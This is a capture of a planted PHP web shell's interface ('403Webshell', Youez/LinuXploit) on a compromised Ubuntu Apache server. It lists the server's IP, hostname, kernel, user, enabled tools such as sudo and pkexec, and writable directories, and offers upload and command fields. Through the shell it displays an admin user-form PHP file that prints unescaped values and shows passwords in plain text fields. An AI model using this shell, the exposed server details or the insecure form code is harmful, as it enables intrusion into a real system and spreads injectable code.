403Webshell
Server IP : 93.86.61.54  /  Your IP : 216.73.216.60
Web Server : Apache/2.4.62 (Ubuntu)
System : Linux rasin.ddns.net 6.8.0-124-generic #124~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 21:05:19 UTC x86_64
User : www-data ( 33)
PHP Version : 8.4.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/projects/radvre/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/projects/radvre/admin/form_usr.php
<?php
/**************************************
Project: Radno vreme, 2023.
 Version: PHP 5-7
 Author : M. Kukic
 Note   :
 Link: http://net-nas/w3/radvre_v7/admin/form_usr.php
*****************************************/
//
// FORMA - User
//
echo "<form action='upd_usr.php'>";
echo "ID: ".str_repeat('&nbsp;', 20)."<input type='text' name='id' id='id' value='$id' size='5'>";
echo "<br><br>";
echo "User ID: ".str_repeat('&nbsp;', 11)."<input type='text' name='dispname' id='dispname' value='$dispname' size='16'> ";
echo "<br><br>";
echo "Full Name: ".str_repeat('&nbsp;', 8)."<input type='text' name='fullname' id='fullname' value='$fullname' size='16'> ";
echo "<br><br>";
echo "Pass: ".str_repeat('&nbsp;', 18)."<input type='text' name='passwd' id='passwd' value='$passwd' size='12'>";
echo "<br><br>";
echo "RFID: ".str_repeat('&nbsp;', 16)."<input type='text' name='rfid' id='rfid' value='$rfid' size='12'>";
echo "<br><br>";
echo "Email: ".str_repeat('&nbsp;', 15)."<input type='text' name='email' id='email' value='$email' size='32'>";
echo "<br><br>";
echo "Grupa: ".str_repeat('&nbsp;', 15)."<input type='text' name='groups' id='groups' value='$groups' size='16'>";
echo "<br><br>";
echo "Office: ".str_repeat('&nbsp;', 15)."<input type='text' name='office' id='office' value='$office' size='16'>";
echo "<br><br>";
echo "Admin: ".str_repeat('&nbsp;', 14)."<input type='text' name='admin' id='admin' value='$admin' size='16'>";
echo "<br><br>";
echo "Reports: ".str_repeat('&nbsp;', 13)."<input type='text' name='reports' id='reports' value='$reports' size='16'>";
echo "<br><br>";
echo "Disabled: ".str_repeat('&nbsp;', 11)."<input type='text' name='disabled' id='disabled' value='$disabled' size='16'>";
echo "<br><br>";

echo "St: ".str_repeat('&nbsp;', 22)."<b style='color:red;'>".$ok."</b>";
echo str_repeat('&nbsp;', 17)."<input type='submit' value='Enter'>";
echo "</form>";

?>

Youez - 2016 - github.com/yon3zu
LinuXploit